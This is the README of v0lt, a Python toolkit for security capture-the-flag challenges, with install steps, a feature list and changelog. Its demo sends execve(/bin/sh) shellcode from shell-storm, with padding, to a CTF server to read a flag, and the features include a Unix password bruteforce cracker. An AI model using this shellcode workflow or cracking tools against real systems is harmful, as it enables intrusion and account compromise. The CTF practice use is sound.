v0lt is an attempt to regroup every tool I used/use/will use in security CTF, Python style. A lot of exercises were solved using bash scripts but Python may be more flexible, that's why. Nothing to do with Gallopsled. It's a toy toolkit, with small but specific utils only.
Requirements and Installation
Dependencies:
- Libmagic
- Python3
- BeautifulSoup
- Requests
- filemagic
- hexdump
- passlib
Installation:
# for v0lt install
git clone https://github.com/P1kachu/v0lt.git
cd v0lt
[sudo] python3 setup.py install # sudo is required for potentially missing dependencies
Demo: Shellcodes
>>> from v0lt import *
>>> nc = Netcat("archpichu.ddns.net", 65102)
Connected to port 65102
>>> print(nc.read())
GIVE ME SHELLCODZ
>>> shellhack = ShellHack(4096, "bin","execve")
>>> shellhack.get_shellcodes(shellhack.keywords)
...<SNIPPED>...
85: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
86: Linux/x86:execve (/bin/sh) - 21 Bytes
87: Linux/x86:break chroot execve /bin/sh - 80 bytes
88: Linux/x86:execve(/bin/sh,0,0) - 21 bytes
...<SNIPPED>...
Selection: 86
Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php
Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"
>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit = nc.dialogue("cat flag", 3)
>>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
File name too long
P1kaCTF{sh3llc0de_1s_e4zY}
Implemented:
- Crypto
- Base64
- Ceasar shift
- Hashing functions (SHA, MD5)
- Bits manipulations (XOR, inverse XOR)
- Usual conversions (bytes, strings, hex)
- RSA basics (inverse modulo, inverse power, egcd...)
- Bruteforcing (Dictionnary, custom word)
- Shellcodes
- Shellcode selection and download from Shell-storm repo
- Shellcode formater
- Shell{cat,net}: Sending shellcode made easy
- Automatic padding
- Easy connection support
- Netcat
- Telnet
Changelog
Only includes major features and changes. Bugfixes and minor changes are omitted.
1.3
- Lots of fixes again
- Hexeditor (Dump/Rewrite files)
- Unix password bruteforce cracker
1.2
- Lots of documentation/bugs/framework fixes
- Added bruteforce
- Added linux utils
- Began hexeditor
- Shellhack fixes
- Alert messages
1.0
- Lots of documentation fixes
- Lots of bugfixes
- Added shellhack (shellcodes stuff)
- Added crypto utils
- Added network utils
- Fixed project tree